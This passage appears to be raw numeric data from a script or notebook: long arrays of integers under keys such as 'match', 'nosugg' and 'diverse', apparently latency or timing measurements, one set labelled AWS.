276,272,201,303,248,249,184,208,241,318,458,187,237,212,269,227,262,525,513,261,257,216,248,227,268,207,256,229,251,258,254,263,258,199,235,438,386,12,11,340,332,155,328,353,197,239,275,204,302,218,214,10,176,201,146,91,307,127,164,109,105,105,159,106,93,88,430,199,268,163,329,213,301,412,277,211,278,215,274,295,189,242,157,179,214,259,296,237,161,182,437,433,328,374,364,273,180,190,188,77,118,218,287,231,255,279,105,178,228,248,276,281,281,182,227,311,307,198,277,293,348,236,253,232,332,156,250,288,49,150,146,133,177,197,184,206,250,300,349,256,252,276,371,375,378,411,184,212,465,461,266,261,264,223,65,94,114,164,201,346,202,197,245,235,235,252,248,209,205,265,123,123,119,224,246,221,267,176,266,292,210,206,320,316,213,260,210,256,228,232,276,164,69,124,194,178,116,429,225,245,198,253,104,163,215,211,269,237,282,93,34,89,24,20,130,175,45,18,170,232,85,16,66,71,95,26,184,203,180,225,307,414,468,313,197,241,225,208,253,203,251,288,367,268,261,257,199,238,251,221,253,133,166,361,402,398,180,227,213,260,195,279,290,253,216,262,194,246,208,198,207,251,386,339,218,263,261,268,104,176,274,194,235,357,353,264,335,109,172,166,329,385,169,101,220,200,249,27,23,21,164,286,11,17,132,210,252,282,229,252,248,272,293,222,269,100,156,268,340,212,247,285,280,314,322,125,210,205,242,181,317,317,302,298,98,284,209,252,254,249,281,362,224,264,412,375,157,176,234,232,431,148,236,181,195,31,178,132,128,156,152,124,481,321,317,12,179,191,176,247,189,186,209,251,211,256,30,82,214,316,245,227,63,84,68,86,90,161,248,245,260,318,367,248,244,271,326,16,13,10,13,19,273,270,230,226,222,218,132,222,283,223,245,287,230,307,206,245,206,238,244,240,85,155,56,55,16,50,89,163,63,239,256,298,200,231,245,283,209,77,207,211,228,102,114,116,188,206,231,483,252,249,258,272,59,55,16,48,439,123,128,67,25
2,248,160,324,215,279,271,287,200,277,410,121,170,16,14,248,128,183,213,247,10,157,270,254,186,231,234,250,214,279,167,212,127,123,189,233,186,231,259,235,252,246,201,246,28,231,233,289,223,329,326,228,225,256,320,103,171,217,262,147,211,251,222,273,419,290,280,58,363,145,143,147,230,227,271,321,253,253,233,169,178,249,246,261,258,324,206,236,224,269,249,389,340,286,150,147,95,91,108,203,233,292,164,160,406,441,437,47,129,55,206,274,270,153,198,237,240,40,185,86,232,233,278,221,250,294,214,257,338,334,250,303,263,347,119,212,256,251,421,427,270,316,361,358,164,177,221,235,330,203,286,343,341,98,149,206,244,88,98,224,269,133,328,129,172,262,103,280,279,127,222,236,281,71,53,233,328,76,114,524,519,111,203,274,318,308,263,259,148,234,280,121,241,245,270,50,47,47,152,134,130,164,233,107,157,434,431,446,442,305,314,286,282,229,273,166,133,195,192,202,44,226,76,71,284,329,127,200,277,255,279,275,179,207,236,201,238,280,191,230,151,182,178,200,197,205,237,236,243,47,179,14,23,194,19,129,284,250,247,184,201,209,207,192,189,211,103,154,316,312,242,240,211,262,258,254,240,341,107,86,106,262,83,79,213,253,63,59,81,338,244,239,268,265,205,241,188,208,254,300,296,209,274,222,265,212,255,17,186,182,209,256,152,203,247,175,283,355,286,155,311,309,229,275,201,392,213,264,191,234,206,232,302,299,234,266,138,206,215,256,224,267,200,249,256,202,246,209,251,166,162,15,52,164,198,233,276,166,187,98,279,276,215,237,238,263,272,326,15,81,339,335,335,141,186,212,257,218,250,208,109,146,192,226,206,253,325,322,351,147,179,157,183,179,501,546,266,262,102,181,164,113,171,245,282,167,208,268,263,100,111,163,254,295,273,226,266,240,249,275,197,193,301,297,174,289,286,155,53,87,83,247,292,227,266,233,226,270,366,455,312,275,320,615,708,252,334,142,225,253,250,222,269,336,333,364,235,232,228,256,298,293,35,30,118,112,186,248,27,157,185,221,11,11,170,184,170,272,409,411,151,226,261,209,159,333,398,400,123,202,236,86,197,207,243,245,106,184,166,211,357,357,256,379,284,251,100,106,353,357,227,38,293,201,215,223,270,273,280,299,223,280,282,196,243,205,423,441,453,354,371,299,344,296,298,196,110,191,236,255,276,285,206,359,362,362,228,299,243,130,255,311,405,406,185,250,251,133,187,185,161,274,276,190,225,346,347,363,247,372,373,253,315,321,349,305,264,265,237,241,128,268,270,16,265,313,186,79,176,172,158,183,213,267,205,230,242,244,209,217,265,197,158,134,291,140,78,335,337,363,48,160,114,176,258,264,202,263,298,266,266,422,200,313,364,222,302,347,39,165,98,185,200,30,174,83,51,191,216,274,183,191,168,28,197,221,159,211,134,157,138,128,194,207,225,34,165,156,342,344,391,281,206,192,146,313,313,177,115,66,243,246,247,169,99,234,235,331,331,363,163,222,266,316,338,339,238,137,199,38,203,250,161,167,205,247,191,269,273,163,209,261,209,252,68,366,367,139,217,219,220,221,422,419,438,440,265,279,213,239,290,166,221,206,215,252,77,52,227,228,273,107,166,168,162,209,170,229,181,65,91,168,199,211,72,118,180,234,237,243,246,232,256,272,206,226,279,142,162,211,308,309,311,177,285,285,247,248,174,334,357,356,74,191,196,157,81,212,260,276,277,193,197,63,187,267,268,233,165,188,133,188,208,140,192,180,221,269,272,258,274,347,363,363,170,173,119,227,284,206,202,189,248,167,251,295,242,286,244,257,262,264,313,252,268,183,226,270,264,266,188,189,211,266,389,401,404,404,209,153,155,152,174,340,343,196,165,188,240,245,207,250,212,219,269,183,193,236,166,201,171,150,215,160,217,170,341,244,256,296,162,172,178,184,331,347,348,79,166,226,250,226,256,176,247,297,235,236,168,236,238,263,147,128,185,226,100,162,185,272,281,267,269,144,178,194,195,28
2,282,393,395,118,251,303,131,104,413,439,440,144,224,269,116,192,235,203,166,63,242,298,10,20,147,148,114,151,199,129,276,277,29,159,201,252,216,243,232,206,236,174,338,364,367,96,219,250,307,190,266,269,70,189,250,178,211,212,234,115,167,247,249,250,180,178,83,306,322,199,245,343,345,156,157,180,213,237,268,178,168,250,253,276,178,202,142,170,199,199,183,240,211,255,352,373,373,141,244,281,206,250,166,236,254,125,196,256,130,185,83,174,237,255,251,175,224,151,165,311,345,346,348,181,188,170,330,332,352,211,163,304,117,106,177,194,213,229,275,181,106,187,174,181,190,225,246,247,210,173,20,169,255,207,252,171,170,223,264,253,300,141,141,113,24,202,29,393,471,475,127,249,251,174,83,348,371,373,197,199,247,312,354,233,256,218,157,218,225,173,195,217,209,263,182,317,169,169,214,187,203,252,70,173,180,222,168,206,172,267,178,180,331,333,190,174,131,206,261,194,238,208,248,299,339,143,103,142,170,204,243,176,131,222,250,248,224,271,199,240,169,162,220,254,276,146,202,180,257,258,240,184,126,185,180,193,173,188,180,127,130,143,138,190,144,184,173,95,17,99,184,248,221,67,181,163,133,136,168,200,253,185,218,260,261,211,262,225,256,258,167,201,164,123,193,23,169,173,334,336,169,169,200,30,171,296,353,153,17,19,18,197,341,358,158,122,166,351,355,356,258,200,246,242,245,299,72,129,172,200,292,349,350,170,166,223,231,219,100,193,214,200,246,223,335,336,72,226,226,124,128,126,187,195,44,198,133,171,198,209,59,250,291,181,200,266,142,267,269,296,192,203,265,113,180,134,138,188,38,241,59,319,321,18,13,233,359,359,340,344,356,356,356,160,152,180,166,211,254,167,195,199,183,147,193,265,267,182,184,100,206,21,180,223,284,260,80,195,251,172,217,161,137,272,310,24,139,42,178,44,234,181,194,242,292,356,356,388,188,170,206,252,254,266,268,174,131,270,277,137,140,176,133,199,246,252,254,289,361,164,162,168,378,382,405,208,260,222,286,164,207,256,173,252,264,180,327,351,162,204,147,198,196,233,281,161,205,166,104,168,183,243,247,251,252,189,155,283,300,303,119,182,209,181,194,109,242,245,259,311,262,263,291,190,156,216,185,165,321,324,360,138,114,131,164,352,352,355,178,179,233,298,184,172,176,222,241,250,253,291,95,126,114,173,174,217,173,411,432,433,435,292,340,149,173,229,245,127,192,248,258,464,469,512,161,192,249,245,248,208,199,190,216,219,247,250,192,189,338,341,263,264,307,15,332,348,350,59,195,52,54,170,218,272,266,313,169,97,276,331,14,172,86,181,124,182,349,376,379,188,206,270,243,169,178,167,192,255,357,361,234,281,252,255,128,268,338,341,219,255,205,217,305,326,328,169,211,51,285,330,264,266,301,166,281,339,340,248,301,270,275,203,251,158,195,221,242,110,237,294,296,111,173,153,209,252,227,284,144,172,107,176,98,278,281,162,242,295,296,202,241,318,344,208,270,188,193,266,266,304,188,195,198,251,290,311,315,171,102,419,460,155,324,343,346,289,298,350,209,248,162,472,474,474,194,247,379,407,409,155,165,163,335,339,339,204,254,199,32,362,370,410,157,219,255,348,197,139,192,343,355,435,437,458,460,217,192,165,203,228,280,177,218,251,222,258,272,298,215,277,225,275,159,212,258,273,53,138,60,256,384,212,258,233,283,274,275,358,276,309,249,225,176,151,200,90,235,359,361,363,115,174,177,252,164,220,252,302,416,419,98,200,149,189,239,273,314,213,18,175,212,189,191,127,163,208,265,238,257,233,154,235,274,183,277,131,137,196,128,73,253,258,240,241,111,170,147,200,178,214,254,99,260,186,249,304,358,387,388,191,173,204,190,271,373,374,391,337,217,541,556,553,177,251,189,48,146,267,70,164,162,222,97,251,153,63,92,224,94,197,165,79,366,390,393,116,184,205,242,179,168,133,270,113,186,285,309,323,334,336,184,178,159,1
61,151,252,256,284,167,104,100,160,92,122,90,52,411,413,445,225,271,161,163,168,170,132,177,230,234,212,246,158,65,259,271,160,266,268,344,348,367,368,207,332,334,258,260,276,446,446,217,265,302,348,208,64,163,321,324,241,242,177,225,115,145,112,323,339,137,210,250,254,417,426,428,149,270,204,246,256,133,159,513,535,538,547,181,236,173,331,334,346,366,195,166,93,17,26,189,148,270,177,345,364,157,37,223,168,181,252,259,170,176,206,240,28,215,226,202,224,24,121,154,196,192,182,229,29,111,213,28,184,218,222,49,313,315,179,19,123,294,412,432,435,283,306,298,200,229,255,160,113,184,214,203,171,135,171,61,199,150,171,249,177,233,251,166,175,166,347,181,184,157,206,161,345,349,373,243,245,183,211,170,223,218,165,252,333,339,135,106,196,95,246,181,176,399,445,450,268,271,211,157,568,591,593,248,252,334,347,350,322,323,164,206,153,299,334,173,523,590,592,592,197,256,167,283,285,312,243,215,262,246,248,168,163,211,232,319,338,346,217,258,202,245,224,268,206,203,213,294,184,148,147],"match":[244,292,212,192,246,304,305,245,262,250,194,206,224,293,226,258,209,317,254,207,215,183,225,286,280,263,41,151,10,9,233,289,194,227,188,230,178,160,157,332,290,344,375,562,579,575,44,46,225,225,134,143,191,228,237,140,197,219,298,312,230,241,208,232,163,214,341,332,377,183,258,193,184,216,192,226,180,217,284,280,310,190,237,189,355,455,373,177,102,151,223,288,271,174,173,214,198,237,167,163,159,189,301,200,239,241,177,214,235,239,241,226,196,230,215,210,215,313,280,172,202,238,190,202,117,163,91,103,197,258,203,209,245,233,263,202,268,209,224,242,197,234,268,228,224,161,154,152,169,231,227,197,237,173,138,172,289,285,225,220,69,70,167,179,174,204,161,163,307,14,155,187,233,203,211,164,181,219,104,198,195,243,240,397,99,167,202,233,221,217,183,227,74,69,159,113,196,209,191,237,210,218,165,176,172,174,210,267,274,323,227,79,79,176,206,195,112,161,83,186,168,118,113,211,237,238,323,353,196,235,72,137,200,240,197,218,247,282,210,275,319,195,234,252,431,449,458,413,217,243,343,65,81,312,217,183,226,235,288,261,323,373,360,358,181,244,195,238,232,353,233,183,261,254,399,368,142,138,200,289,278,227,276,177,10,165,113,166,163,220,238,235,260,268,189,145,212,344,269,291,229,289,263,280,276,115,111,119,115,58,79,74,202,234,140,60,237,247,156,153,190,239,23,79,157,408,200,233,207,224,229,419,102,152,224,295,276,119,292,321,306,292,194,244,221,293,275,207,203,172,245,241,191,226,208,226,140,215,257,195,191,224,159,293,374,379,218,206,217,37,168,221,277,199,228,249,288,206,315,199,239,292,207,12,10,331,326,198,299,333,258,283,209,169,171,56,93,215,195,244,202,275,252,247,230,153,233,284,283,225,217,55,141,161,184,221,181,177,225,249,187,209,208,271,245,138,193,187,223,232,292,295,148,211,207,401,157,185,198,254,229,121,273,254,229,196,245,310,162,101,97,293,305,327,196,233,204,233,213,237,193,224,88,84,207,233,140,160,239,235,115,200,230,29,79,79,87,329,370,405,415,244,59,80,194,221,251,247,267,203,233,200,212,225,260,176,227,223,194,271,166,187,225,128,124,287,315,301,80,265,261,190,229,73,85,261,257,186,257,127,79,121,208,179,103,161,191,294,189,227,156,167,77,75,69,187,222,211,272,69,90,103,167,11,127,434,473,231,256,155,145,308,196,259,226,184,226,153,230,227,120,215,233,145,141,83,79,13,92,259,470,427,485,194,235,189,228,184,223,224,223,210,79,109,200,229,328,296,341,187,227,212,225,257,192,250,179,155,293,263,202,231,191,230,270,428,197,245,59,62,238,234,178,217,231,270,208,240,178,185,222,119,174,192,215,271,268,212,200,234,210,283,270,118,170,315,310,307,142,205,201,189,250,283,225,296,217,262,208,280,182,199,236,234,2
76,328,242,234,199,244,235,233,166,163,67,230,104,84,161,202,200,180,125,271,196,259,226,341,213,249,202,230,397,393,217,213,101,151,293,302,273,216,228,223,315,154,261,257,144,204,275,188,220,242,169,242,188,226,242,321,245,194,217,375,303,349,198,249,177,173,199,194,225,212,246,94,110,195,241,156,91,162,392,387,389,256,212,393,277,274,90,461,457,443,262,298,243,273,391,346,342,271,159,176,232,258,290,352,209,181,219,158,225,223,323,262,209,205,187,222,175,221,148,455,227,223,211,222,315,235,391,298,110,106,53,210,250,208,241,137,188,180,215,159,193,237,218,256,9,54,164,160,194,227,210,239,90,86,77,201,241,269,241,269,78,80,166,162,191,224,300,392,295,202,201,250,248,125,199,250,131,362,407,173,253,207,268,313,208,214,260,156,222,267,297,424,281,291,379,379,374,13,157,96,196,242,266,263,147,292,291,390,350,237,250,248,214,258,236,276,230,246,330,327,327,252,249,89,208,252,186,182,85,81,47,93,155,271,267,356,383,182,66,109,285,281,257,307,33,84,209,254,91,25,216,318,211,246,391,387,143,219,77,157,245,241,197,160,216,260,89,85,272,279,327,371,343,209,286,282,163,185,173,217,203,312,356,230,239,206,240,203,226,174,301,297,201,276,214,231,244,50,46,198,194,124,205,199,244,128,174,209,257,212,256,191,407,108,153,215,225,260,123,374,275,208,118,253,118,183,138,135,259,360,395,279,260,303,242,31,66,245,333,253,378,419,120,216,251,242,238,319,284,329,238,263,170,250,336,243,257,254,205,242,235,231,248,296,248,224,268,256,297,292,223,201,241,240,330,162,296,292,339,225,417,414,378,84,89,381,376,204,127,175,224,265,296,372,249,271,267,265,309,194,231,232,43,165,237,298,296,141,181,203,9,102,176,124,224,221,365,360,45,162,159,226,272,26,268,314,331,232,152,227,226,121,199,244,251,293,284,16,168,286,283,239,28,69,192,239,224,219,117,168,208,252,220,275,160,166,269,315,313,214,215,250,217,263,198,239,200,244,211,370,191,233,203,231,270,267,334,332,377,152,230,248,106,227,264,473,470,496,457,196,237,332,189,229,231,240,239,267,251,285,276,322,318,170,213,126,221,266,235,233,307,254,188,331,213,186,230,274,113,170,264,259,136,164,216,252,203,247,157,205,286,165,169,222,266,273,199,239,211,261,196,193,164,320,361,198,229,300,348,307,222,244,182,257,138,268,112,200,238,320,349,235,305,199,353,338,202,247,18,54,77,73,318,364,11,192,139,136,56,96,199,195,224,155,200,129,287,336,260,256,294,339,201,231,236,254,180,203,219,110,106,217,301,299,114,59,55,226,322,152,175,217,254,144,157,182,234,229,96,141,31,85,225,270,235,258,144,373,370,181,176,202,237,235,279,104,221,256,182,106,161,105,108,223,264,269,357,443,312,197,229,205,322,50,74,149,223,282,234,426,321,217,249,196,243,75,89,189,359,196,222,179,499,457,524,137,133,212,126,199,234,64,60,237,263,364,194,244,231,263,234,230,115,251,221,262,206,220,310,225,258,254,177,222,243,320,248,249,280,246,292,305,173,187,179,186,225,262,258,205,201,228,262,194,239,227,300,254,229,250,276,307,384,387,233,229,216,224,270,218,223,207,252,265,307,189,270,161,163,91,88,344,312,313,135,131,214,401,251,194,194,233,218,445,489,378,173,176,77,141,207,246,218,249,267,263,255,346,207,202,227,254,280,238,235,327,324,326,153,150,236,45,85,218,259,182,232,148,193,194,236,219,258,186,207,225,212,284,269,198,248,149,200,291,342,361,329,380,300,105,84,81,280,327,233,230,197,16,12,136,149,302,299,207,237,126,172,204,34,246,203,250,241,200,241,87,174,296,285,197,234,111,106,163,389,386,279,420,226,256,237,241,187,232,219,240,332,328,250,205,244,336,240,237,201,243,258,254,370,365,384,147,170,262,120,215,264,259,233,163,160,206,86,112,199,208,266,263,218,260,366,473,408,318,222,255,411,4
08,291,288,297,275,316,258,204,240,205,247,236,245,234,272,41,58,177,225,195,183,180,170,246,207,245,33,99,224,247,86,118,83,168,224,240,205,240,204,252,225,217,114,170,267,286,303,235,233,79,81,26,173,108,229,166,173,215,206,243,168,213,178,232,269,208,278,202,88,174,117,234,144,80,92,331,41,160,251,290,141,198,246,83,147,239,237,240,176,137,157,96,92,31,100,20,68,124,207,235,279,213,343,251,206,248,68,65,30,207,239,236,242,272,209,253,184,226,215,255,255,383,255,460,213,303,214,257,338,350,199,238,174,237,195,268,255,419,415,198,239,306,302,236,449,240,236,232,268,264,98,96,151,188,160,200,104,165,189,238,215,238,236,264,257,254,241,281,233,253,34,78,167,198,14,18,176,173,111,108,18,23,234,244,26,78,160,226,118,253,273,162,182,111,224,269,214,170,227,320,319,223,268,122,208,236,223,278,217,260,247,244,184,229,77,225,426,422,357,149,90,93,195,240,72,116,201,245,134,426,213,234,147,188,280,224,268,326,335,338,73,73,240,237,198,236,263,307,151,233,323,364,270,209,242,147,224,268,102,181,217,248,24,104,191,392,203,291,125,171,197,223,204,217,29,27,250,247,118,14,15,158,156,39,44,510,351,19,53,159,158,215,260,66,182,218,200,245,223,578,104,34,194,239,273,319,286,71,176,15,199,378,375,276,233,278,93,283,338,290,188,388,438,217,185,121,182,149,148,271,229,317,11,160,200,245,268,266,151,147,20,16,235,120,180,301,298,333,98,155,115,176,62,61,222,321,404,330,327,295,86,85,282,278,170,219,265,478,469,221,266,70,103,192,241,227,237,128,177,337,336,161,154,282,328,227,271,56,208,143,237,200,242,240,279,275,226,272,239,247,29,210,246,290,230,272,90,134,273,268,246,291,237,193,237,127,359,357,258,277,196,240,188,185,246,256,241,205,250,238,244,104,100,165,141,63,59,228,283,298,295,220,221,262,100,143,198,238,37,33,32,29,196,339,198,227,13,18,311,307,137,137,215,261,195,140,144,213,247,201,235,180,123,179,149,144,190,105,164,348,345,125,122,311,358,257,233,273,196,184,220,228,225,250,221,232,167,163,202,241,132,171,319,195,338,220,152,210,240,199,239,199,239,225,273,83,165,267,265,15,13,358,15,12,26,221,193,380,377,404,192,246,156,175,204,193,189,187,198,217,250,166,207,205,199,222,155,188,211,226,223,197,239,144,140,15,13,189,16,45,30,17,50,20,108,472,517,195,192,162,171,106,183,212,309,431,427,190,170,274,409,172,177,210,174,438,281,239,158,360,168,295,191,182,324,135,287,283,255,151,193,173,194,150,357,165,261,306,145,178,153,145,155,185,11,162,273,279,118,316,243,193,208,151,427,373,243,180,130,281,194,107,135,237,171,238,173,208,279,166,284,163,184,392,260,345,217,111,261,190,218,250,195,423,334,194,128,166,253,188,215,119,148,122,214,234,157,271,213,346,182,153,191,269,186,100,120,375,197,157,244,364,320,84,265,287,255,227,240,190,235,177,186,393,242,203,324,345,238,236,205,203,161,267,168,172,256,183,146,473,136,313,150,257,274,164,140,192,150,220,334,201,206,288,266,239,17,154,159,245,193,197,186,176,158,332,358,174,327,173,336,249,251,217,193,245,318,325,341,214,167,260,180,87,54,139,167,277,207,183,167,156,266,325,108,51,15,107,27,44,49,20,15,42,31,74,17,174,378,224,193,87,112,208,360,202,339,160,306,234,277,84,111,267,276,313,420,433,121,132,349,357,277,178,210,199,381,69,103,352,357,296,268,175,175,12,35,251,256,382,420,65,184,165,193,249,191,109,240,33,28,75,234,32,108,162,262,174,169,171,212,50,13,143,126,76,149,235,389,216,204,355,357,495,543,211,252,54,73,249,170,270,290,165,165,332,254,237,161,165,272,172,210,194,231,249,268,196,228,302,15,146,172,172,158,16,176,20,85,432,56,22,20,11,42,215,248,268,190,252,311,429,449,304,251,324,127,339,429,249,266,208,176,155,205,539,203,169,348,385,23
8,184,164,171,227,167,366,181,174,260,239,152,204,256,227,258,258,255,78,121,58,190,231,177,225,228,145,163,107,258,156,218,247,292,107,150,177,149,278,109,114,415,96,285,315,317,243,230,256,246,15,165,45,195,47,13,13,34,321,345,170,369,168,143,158,150,255,259,154,361,188,154,219,447,208,236,594,304,338,300,480,589,195,109,260,82,91,154]} ''' #%% # AWS stats = ''' {"numInflight":3,"nosugg":[75,93,45,84,57,80,68,64,150,36,49,34,64,39,59,73,39,98,49,68,44,74,39,48,40,75,40,56,36,67,52,38,52,37,126,32,88,69,67,81,158,39,71,39,72,41,73,61,38,52,42,41,54,35,67,41,68,41,76,38,67,35,63,36,49,45,76,38,49,36,65,38,58,50,68,38,69,39,53,70,38,68,41,38,69,43,74,56,66,67,35,65,37,46,44,78,63,65,75,89,38,93,190,110,39,52,46,81,136,125,54,39,70,37,52,81,38,52,38,70,51,80,66,92,42,201,281,196,124,38,76,57,40,115,38,23,28,83,23,46,74,44,60,74,66,43,75,79,45,22,61,90,63,48,118,95,85,58,112,56,80,89,57,79,60,21,39,54,185,126,44,49,40,41,67,90,138,61,51,71,97,111,81,24,22,155,21,26,42,28,95,40,94,154,104,38,63,41,72,40,61,34,47,44,74,46,100,43,44,60,38,35,47,67,38,52,38,69,36,64,32,63,66,43,73,40,39,59,36,69,103,116,53,35,63,46,54,37,74,72,38,66,38,69,37,148,33,60,46,19,38,71,42,72,38,55,18,37,73,41,71,36,70,36,64,34,44,63,36,43,115,51,61,37,49,59,69,55,78,35,33,60,96,51,67,54,74,44,90,124,135,73,149,154,83,41,109,163,105,82,76,192,70,48,131,191,167,42,45,96,100,61,210,56,60,44,32,66,42,133,25,40,138,19,68,50,66,128,53,53,64,67,87,62,84,86,21,114,81,140,117,54,111,46,47,62,42,81,60,71,76,63,109,59,74,73,52,39,54,78,150,71,75,40,49,71,98,39,143,78,51,56,56,51,113,116,39,93,102,117,95,80,123,67,70,86,202,124,96,115,50,94,98,87,94,49,78,45,44,74,75,83,56,91,192,42,75,46,188,135,83,54,53,61,53,56,30,66,194,85,44,66,52,47,107,21,48,89,42,100,107,38,39,83,49,54,111,82,97,130,144,62,86,87,52,93,74,71,58,69,66,48,74,44,38,53,41,44,50,55,63,95,118,49,40,124,54,54,98,116,61,60,44,97,56,37,46,110,228,119,123,97,158,96,92,93,70,50,123,100,54,105,57,55,42,39,77,42,38,41,48,39,41,86,94,81,45,48,47,21,29,78,26,98,39,60,79,59,56,50,28,83,54,156,103,130,169,223,92,49,128,48,43,121,47,113,45,48,73,135,83,47,143,60,114,54,99,106,114,41,62,44,84,55,39,66,38,20,84,37,41,36,47,77,83,42,82,45,54,56,39,97,185,186,41,75,217,101,105,211,73,87,69,51,56,39,141,181,184,41,155,113,83,39,43,122,147,151,152,73,61,115,56,60,62,80,83,110,146,58,50,40,114,42,68,83,70,120,116,45,83,71,80,74,143,203,55,44,95,89,127,110,185,108,115,100,100,58,45,79,52,40,146,111,80,39,84,110,101,39,79,40,39,49,51],"diverse":[263,156,568,144,91,163,96,165,94,138,111,174,93,153,103,167,136,202,123,88,110,97,181,109,178,88,100,133,95,158,21,133,96,163,21,100,21,98,79,78,65,106,85,167,20,34,20,100,92,157,99,164,115,157,192,169,196,90,154,145,46,161,101,132,108,174,66,109,70,111,45,116,88,101,215,100,108,151,89,204,112,88,224,97,100,199,280,144,236,101,138,160,95,162,21,54,67,137,22,50,92,20,34,90,161,56,102,140,103,169,79,125,156,89,87,102,70,130,99,107,91,158,141,92,255,183,91,132,139,104,204,85,104,135,221,90,143,21,30,21,222,105,178,105,201,128,181,252,198,157,105,194,119,185,90,147,47,53,116,100,172,46,70,125,214,89,167,95,206,207,93,20,150,21,30,192,188,220,193,88,170,103,180,102,180,110,153,49,115,107,185,102,148,95,94,154,139,113,139,90,201,235,322,124,241,87,145,101,154,107,108,151,89,138,257,88,143,91,156,157,234,96,165,92,171,99,197,90,190,21,30,93,167,109,217,177,255,106,176,96,182,89,152,118,103,62,102,135,133,63,106,52,82,159,200,486,73,122,170,99,139,108,60,126,138,114,116,97,184,138,125,141,160,161,228,131,182,133,136,87,103,126,106,165,166,144,202,199,
91,150,178,91,158,81,178,64,134,45,117,105,168,85,106,93,184,165,186,296,138,91,162,72,87,117,179,45,89,84,150,86,138,195,90,165,90,144,91,175,86,155,118,222,158,102,172,114,81,91,208,93,138,183,87,52,117,82,108,49,176,53,151,99,169,98,178,126,114,192,94,171,131,132,39,106,105,130,92,162,96,195,94,161,70,140,120,92,129,49,67,22,45,47,64,20,42,57,47,114,136,221,68,97,184,115,98,116,257,256,81,160,270,129,168,168,69,131,242,186,187,87,50,133,133,143,220,222,95,149,131,176,175,147,132,200,21,98,22,79,127,130,163,160,187,188,135,141,148,104,234,236,152,126,126,163,97,206,119,179,135,228,237,142,169,153,154,89,98,193,195,194,191,211,115,219,203,175,173,173,275,76,227,122,206,206,155,137,116,151,157,92,28,28,156,34,22,109,128,144,209,249,84,126,170,193,145,96,133,99,180,240,242,89,149,136,175,185,77,176,90,110,178,115,132,148,148,62,109,148,164,128,169,170,120,66,113,79,95,137,110,144,176,127,119,99,133,24,25,64,85,118,44,178,195,94,44,129,211,102,206,144,155,399,403,170,256,28,116,35,31,24,138,188,101,99,129,200,100,148,149,153,128,106,112,106,123,89,65,133,116,215,241,166,116,101,42,123,126,176,142,115,47,62,132,140,213,215,111,184,119,181,48,56,124,25,58,99,153,152,112,83,91,99,109,89,122,48,103,24,183,95,168,38,228,114,40,110,50,190,66,152,95,81,105,136,135,183,186,95,107,125,160,160,186,145,340,342,59,145,150,105,69,92,62,170,261,261,173,125,86,117,90,90,101,22,137,111,153,142,200,202,308,313,101,222,139,98,131,57,178,154,162,99,192,51,80,94,107,152,103,107,85,76,110,179,119,83,94,216,218,173,182,96,169,151,184,201,145,85,95,113,95,110,135,182,134,134,143,147,112,26,63,222,228,32,151,22,151,75,119,150,98,97,186,187,103,165,165,86,105,84,147,74,119,92,126,51,306,317,21,70,74,30,121,106,159,156,80,52,187,188,191,136,138,179,182,116,151,134,142,152,79,151,74,46,59,174,232,214,213,173,168,295,149,249,153,144,121,51,166,145,146,173,128,205,139,142,82,68,154,190,119,69,91,22,68,171,211,99,69,29,157,139,122,158,133,144,198,98,80,99,107,113,130,165,146,88,143,139,102,153,127,259,96,159,150,142,160,155,193,166,161,118,149,178,192,104,91,104,163,186,50,61,48,193,191,93,85,188,21,148,119,130,155,98,79,54,86,122,114,133,160,169,172,155,86,105,177,215,218,104,203,114,251,256,60,54,112,183,269,121,196,197,152,182,92,174,219,56,53,146,35,99,130,176,46,118,170,127,90,112,198,127,148,32,79,135,24,134,157,96,182,101,133,152,172,268,271,94,107,79,133,178,179,101,193,94,110,124,122,141,150,150,154,154,143,127,78,49,254,263,134,87,66,141,166,24,152,122,155,140,194,131,167,167,111,130,132,53,182,156,289,141,147,140,157,189,233,155,196,179,189,113,106,34,163,177,22,144,116,170,126,99,206,92,108,142,145,92,71,139,152,139,110,114,94,166,52,129,154,166,181,183,154,94,123,121,88,91,107,88,182,216,111,174,119,148,169,103,140,131,24,23,145,26,104,30,29,32,137,138,129,55,51,91,158,159,198,199,235,261,243,107,152,216,218,95,106,227,146,147,56,70,110,111,156,99,154,152,79,100,140,105,85,190,194,183,157,98,114,130,21,23,100,29,22,93,269,154,156,92,182,189,145,157,117,163,212,171,231,230,235,70,80,135,161,95,157,141,133,111,136,213,203,93,97,88,117,225,265,121,89,35,91,103,184,185,201,109,113,46,193,141,151,184,185,108,217,138,140,185,185,146,105,123,89,182,63,70,181,136,137,84,145,91,242,245,101,92,25,177,80,149,149,48,44,141,189,191],"match":[96,155,330,336,84,145,90,253,106,173,88,150,91,214,110,170,82,154,89,157,88,151,82,148,92,86,276,81,148,116,188,143,151,224,88,95,187,85,147,121,177,125,235,133,149,148,238,96,158,86,146,194,20,30,144,155,104,172,42,113,100,172,91,112,143,226,162,136,199,87,153,96,158,94,195,132,106,1
55,251,91,102,172,94,158,87,110,85,147,106,160,93,160,81,128,124,95,89,240,94,159,110,176,128,189,80,143,84,147,160,89,153,40,102,86,85,85,144,48,69,85,97,159,52,86,158,170,222,154,117,83,142,43,134,129,125,87,182,86,86,183,111,140,103,86,178,127,72,101,159,84,169,90,153,93,160,121,184,68,75,149,90,69,152,85,160,97,98,158,206,94,157,146,226,94,155,86,150,97,156,85,143,84,147,46,58,36,49,84,144,81,176,36,86,145,35,138,151,106,93,126,158,94,66,91,146,135,222,199,262,49,114,93,158,89,152,135,90,154,46,113,86,155,87,50,145,84,188,98,88,111,89,156,93,162,109,137,92,155,160,181,47,66,118,198,85,144,48,116,92,137,46,78,142,94,178,89,150,22,37,90,197,102,166,68,90,157,159,100,87,140,92,155,103,181,84,126,32,93,90,166,256,172,21,98,85,147,103,118,68,88,127,181,96,161,87,180,84,152,38,105,83,184,109,96,177,87,145,129,91,198,83,145,188,127,132,198,43,115,106,160,60,162,126,54,192,189,125,173,84,146,83,133,202,86,151,62,141,44,65,96,166,45,108,122,116,112,39,124,65,171,84,157,43,119,92,90,149,91,155,115,142,199,132,197,85,149,84,147,82,179,102,168,178,87,186,93,154,95,219,90,155,95,113,85,163,85,102,61,119,75,146,109,102,223,43,61,93,155,81,184,124,86,154,99,198,135,195,93,155,111,92,187,47,120,88,77,156,89,151,102,163,95,159,120,185,47,87,109,144,184,154,96,121,20,58,96,201,140,194,133,246,130,196,87,149,155,207,222,240,83,153,83,186,139,96,64,86,88,138,54,69,81,44,109,87,116,44,62,121,84,145,169,165,189,201,85,152,85,154,96,92,87,188,106,117,197,96,207,231,299,98,83,89,183,90,151,46,95,91,151,89,153,86,135,71,140,120,145,92,71,134,96,169,100,214,81,143,96,166,128,145,43,124,83,96,161,105,147,90,157,97,164,86,157,42,63,88,148,179,238,136,139,44,123,100,96,92,117,218,285,88,144,84,